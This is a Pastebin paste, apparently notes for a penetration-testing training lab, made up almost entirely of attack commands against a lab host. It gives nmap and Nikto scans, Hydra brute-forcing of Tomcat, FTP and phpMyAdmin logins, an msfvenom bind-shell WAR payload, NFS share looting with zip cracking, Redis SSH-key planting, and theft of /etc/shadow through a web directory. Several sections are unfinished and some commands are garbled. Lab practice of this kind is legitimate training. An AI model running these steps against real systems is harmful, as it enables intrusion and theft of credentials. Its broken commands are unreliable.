API tools faq
paste
Advertisement
joemccray

Quick Lab

joemccray
Jun 8th, 2016
1,024
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.02 KB | None | 0 0
raw download clone embed print report
  1. #########################
  2. # Building a quick list #
  3. #########################
  4. cd ~
  5. echo bob >> list.txt
  6. echo jim >> list.txt
  7. echo joe >> list.txt
  8. echo tim >> list.txt
  9. echo admin >> list.txt
  10. echo hello >> list.txt
  11. echo rob >> list.txt
  12. echo test >> list.txt
  13. echo aaaaaa >> list.txt
  14. echo larry >> list.txt
  15. echo mario >> list.txt
  16. echo jason >> list.txt
  17. echo john >> list.txt
  18.  
  19.  
  20. ##############
  21. # Using Nmap #
  22. ##############
  23. ******** NOTE: Some of these scans may take up to an hour to run... ********
  24. ******** NOTE: Open them in another terminal window and keep going ********
  25.  
  26. sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120
  27.  
  28. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
  29.  
  30. sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120
  31.  
  32. sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120
  33.  
  34. sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120
  35.  
  36.  
  37. ******** NOTE: Some of these scans may take up to an hour to run... ********
  38. ******** NOTE: Open them in another terminal window and keep going ********
  39.  
  40.  
  41.  
  42. ###############
  43. # Using Nikto #
  44. ###############
  45. cd ~/toolz/nikto-2.1.1
  46.  
  47. perl nikto.pl -update
  48.  
  49. perl nikto.pl -h 10.0.0.120
  50.  
  51. perl nikto.pl -h 10.0.0.120:8080
  52.  
  53. perl nikto.pl -h 10.0.0.120:8081
  54.  
  55. perl nikto.pl -h 10.0.0.120:9000
  56.  
  57.  
  58.  
  59.  
  60. ####################
  61. # Using Metasploit #
  62. ####################
  63. cd ~/toolz/metasploit
  64.  
  65. ./msfconsole
  66.  
  67. use auxiliary/scanner/http/http_version
  68.  
  69. set RHOSTS 10.0.0.120
  70.  
  71. set RPORT 8080
  72.  
  73. run
  74.  
  75.  
  76. -------------------------------
  77.  
  78. use auxiliary/scanner/http/tomcat_enum
  79.  
  80. set RHOSTS 10.0.0.120
  81.  
  82. set RPORT 8080
  83.  
  84. run
  85.  
  86.  
  87.  
  88.  
  89.  
  90. ####################
  91. # Attacking Tomcat #
  92. ####################
  93. cd ~/toolz/metasploit
  94.  
  95. ./msfconsole
  96.  
  97. use auxiliary/scanner/http/http_version
  98.  
  99. set RHOSTS 10.0.0.120
  100.  
  101. set RPORT 8080
  102.  
  103. run
  104.  
  105.  
  106.  
  107.  
  108.  
  109. use auxiliary/scanner/http/tomcat_enum
  110.  
  111. set RHOSTS 10.0.0.120
  112.  
  113. set RPORT 8080
  114.  
  115. run
  116.  
  117.  
  118.  
  119. -------------------------------
  120.  
  121.  
  122. hydra -l tomcat -P /home/strategicsec/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html
  123.  
  124.  
  125. ****** This section isn't finished ******
  126.  
  127. cd ~/toolz/metasploit
  128.  
  129. ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/strategicsec/bind7777.war
  130.  
  131. jar tf ~/bind7777.war
  132.  
  133. ****** This section isn't finished ******
  134.  
  135.  
  136.  
  137. #################
  138. # Attacking FTP #
  139. #################
  140.  
  141. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120
  142.  
  143. cd ~/toolz/hydra
  144.  
  145. hydra -l admin -P /home/strategicsec/list.txt -u -s 25 10.0.0.120 ftp
  146.  
  147. ftp
  148. open 10.0.0.120
  149. admin
  150. admin
  151. pwd
  152. ls -lah
  153.  
  154. ls ../../
  155.  
  156. ssh -p 1322 admin@10.0.0.120
  157.  
  158.  
  159. ########################
  160. # Attacking phpMyAdmin #
  161. ########################
  162. ****** This section isn't finished ******
  163.  
  164. hydra -l root -P /home/strategicsec/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
  165.  
  166. ****** This section isn't finished ******
  167.  
  168.  
  169. ####################
  170. # Attacking Joomla #
  171. ####################
  172. cd ~/toolz/metasploit
  173.  
  174. ./msfconsole
  175.  
  176. use use auxiliary/scanner/http/joomla_plugins
  177.  
  178. set RHOSTS 10.0.0.120
  179.  
  180. set RPORT 8080
  181.  
  182. run
  183.  
  184.  
  185. ****** This section isn't finished ******
  186.  
  187.  
  188. #####################
  189. # Attacking Jenkins #
  190. #####################
  191. ./msfconsole
  192.  
  193. use auxiliary/scanner/redis/file_upload
  194.  
  195. set LOGIN_URL/j_acegi_security_check
  196.  
  197. set USER_FILE /home/strategicsec/list.txt
  198.  
  199. set PASS_FILE /home/strategicsec/list.txt
  200.  
  201. set RHOSTS 10.0.0.120
  202.  
  203. set RPORT 9000
  204.  
  205. exploit
  206.  
  207. ****** This section isn't finished ******
  208.  
  209.  
  210. #################
  211. # Attacking NFS #
  212. #################
  213. rpcinfo -s 10.0.0.120
  214.  
  215. showmount -e 10.0.0.120
  216.  
  217. mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock
  218.  
  219. ls /tmp/nfs
  220.  
  221. cp /tmp/nfs/backup.tar.bz2.zip /home/strategicsec
  222. umount -l /tmp/nfs
  223.  
  224. sudo apt-cache search fcrackzip
  225.  
  226. sudo apt-get install -y fcrackzip
  227.  
  228. fcrackzip -D -p /home/strategicsec/list.txt
  229.  
  230. unzip -P aaaaaa backup.tar.bz2.zip
  231.  
  232. tar -zxvf backup.tar.bz2
  233.  
  234.  
  235. ###################
  236. # Attacking Redis #
  237. ###################
  238. sudo nmap -p 6379 --script=redis-info 10.0.0.120
  239.  
  240. sudo apt-get install -y redis-tools
  241.  
  242. redis-cli -h 10.0.0.120
  243.  
  244. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
  245.  
  246.  
  247.  
  248. ****** This section isn't finished ******
  249.  
  250. cd ~/toolz/metasploit
  251.  
  252. ./msfconsole
  253.  
  254. use auxiliary/scanner/redis/file_upload
  255.  
  256. set RHOSTS 10.0.0.120
  257.  
  258. set LocalFile
  259.  
  260. ****** This section isn't finished ******
  261.  
  262. ##############################
  263. # Local Privilege Escalation #
  264. ##############################
  265. ssh -p 1322 admin@10.0.0.120
  266. admin
  267.  
  268. find / -perm -u=s -type f 2>/dev/null
  269.  
  270. ls -lah /bin/cp
  271.  
  272. cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt
  273.  
  274. --------------------
  275. *** From another terminal window ***
  276.  
  277. wget http://10.0.0.120:8081/shadow.txt
  278.  
  279. --------------------
  280. *** Back to original terminal window ***
  281. cat /etc/crontab | grep hour
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!